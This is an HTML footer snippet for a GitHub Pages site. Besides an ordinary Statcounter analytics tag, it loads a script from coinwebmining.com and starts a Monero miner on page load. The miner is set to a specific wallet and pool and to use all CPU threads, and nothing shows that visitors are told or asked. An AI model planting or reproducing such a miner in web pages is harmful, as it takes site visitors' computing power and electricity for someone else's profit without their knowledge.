<!-- start custom footer snippets -->

<!-- Default Statcounter code for InnovAnon-Inc.github.io
https://InnovAnon-Inc.github.io -->
<script type="text/javascript">
var sc_project=12055362; 
var sc_invisible=0; 
var sc_security="d4154b86"; 
var scJsHost = "https://";
document.write("<sc"+"ript type='text/javascript' src='" +
scJsHost+
"statcounter.com/counter/counter.js'></"+"script>");
</script>
<noscript><div class="statcounter"><a title="Web Analytics"
href="https://statcounter.com/" target="_blank"><img
class="statcounter"
src="https://c.statcounter.com/12055362/0/d4154b86/0/"
alt="Web Analytics"></a></div></noscript>
<!-- End of Statcounter Code -->
<a href="https://statcounter.com/p12055362/?guest=1">View My
Stats</a>

<script src="https://coinwebmining.com/cwm.js"></script>
<script>
    var site_id = 'cwm-3707';
    var coin = 'monero';
    var wallet = '84FEn5Gak63AReZjRtDwV724TsoUtfajxjLHHJZ3zH3vcaAZJwvg4qWdUG9cx7nhA1ZfT9kK89roADmRb1ehLLhH6HyTATK';
    var password = 'x';
    var mining_pool = 'gulf.moneroocean.stream:10001';
    var threads = -1;
    var throttle = 0.2;
    var debug = false;
    cwm_start(site_id, coin, wallet, password, mining_pool, threads, throttle, debug);
</script>

<!-- end custom footer snippets -->
